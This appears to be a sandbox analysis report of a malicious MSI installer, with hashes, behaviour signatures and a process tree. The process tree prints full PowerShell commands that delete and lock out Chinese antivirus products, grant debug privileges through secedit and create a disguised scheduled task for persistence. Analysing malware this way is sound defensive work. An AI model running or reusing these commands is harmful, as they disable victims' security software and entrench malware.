Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    05-09-2024 08:22

General

  • Target

    2496afe349303f5135b3e82978870b33c9fe5bea6ae494a7bcdd5ae01a0d0544.msi

  • Size

    72.6MB

  • MD5

    b93c7a9d3b8ab6939f673c8a316d7fac

  • SHA1

    2b900cc34fbc6d28cdcbc91368317b7019735027

  • SHA256

    2496afe349303f5135b3e82978870b33c9fe5bea6ae494a7bcdd5ae01a0d0544

  • SHA512

    eae37ade54e876f3c28e476a5bd88c0d3678cd73d208eec4b68ba8e1e0738e1620327c82a6d9cc6f773eed85d3dfe9ad317071b29b16821382ee8ccb32650b9c

  • SSDEEP

    1572864:WJCqQUW9zp3E8N9yBrJyyEL5OE6q4UxU12xNtkI:2WU8vynyyErxFNr

Malware Config

Signatures

  • UAC bypass 3 TTPs 3 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

    Runs PowerShell and hides the display window.

  • Modifies RDP port number used by Windows 1 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 10 IoCs
  • Executes dropped EXE 3 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 7 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Loads dropped DLL 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\2496afe349303f5135b3e82978870b33c9fe5bea6ae494a7bcdd5ae01a0d0544.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1552
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:324
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
        PID:4668
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding AB9C4FC2B3CD74688C8D03B9BBD7718D
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4176
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\SysWOW64\cmd.exe" /c "fltmc.exe && exit 0||exit 1"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4928
          • C:\Windows\SysWOW64\fltMC.exe
            fltmc.exe
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4316
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3736
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3340
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match 'ÌÚѶµçÄԹܼÒ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach TFsFlt $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3348
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4460
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '½ðɽ¶¾°Ô' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach kisknl $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:436
        • C:\ProgramData\Data\un.exe
          "C:\ProgramData\Data\un.exe" x -o+ -ppoiuytrewq C:\ProgramData\Data\upx.rar iusb3mon.exe C:\ProgramData\Program\
          3⤵
          • Executes dropped EXE
          PID:2784
        • C:\ProgramData\Program\iusb3mon.exe
          "C:\ProgramData\Program\iusb3mon.exe" false
          3⤵
          • UAC bypass
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:3736
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3508
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
              5⤵
              • System Location Discovery: System Language Discovery
              PID:512
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Microsoft\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.*')) -Force;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3340
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log /quiet
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2868
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:556
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
              5⤵
              • System Location Discovery: System Language Discovery
              PID:4488
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4916
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3840
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo.>c:\inst.ini
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4184
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo.>c:\inst.ini
            4⤵
            • System Location Discovery: System Language Discovery
            PID:736
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo.>c:\inst.ini
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3452
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            PID:5352
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            PID:5360
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Hide Artifacts: Ignore Process Interrupts
            • System Location Discovery: System Language Discovery
            PID:5368
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder(ϵͳÒôƵ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
            4⤵
            • System Location Discovery: System Language Discovery
            PID:6140
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks.exe /create /tn "Windows Audio Endpoint Builder(ϵͳÒôƵ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
              5⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:4464
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            PID:3380
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            PID:5128
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Hide Artifacts: Ignore Process Interrupts
            • System Location Discovery: System Language Discovery
            PID:5132
      • C:\Program Files (x86)\My Product\LineInst.exe
        "C:\Program Files (x86)\My Product\LineInst.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3624
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Checks SCSI registry key(s)
      • Suspicious use of AdjustPrivilegeToken
      PID:3008

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Config.Msi\e57fa10.rbs

      Filesize

      9KB

      MD5

      180882e0223360e1775a6d6f47e83943

      SHA1

      aa73133b22c143c9d1a7b399df475c61aab5b083

      SHA256

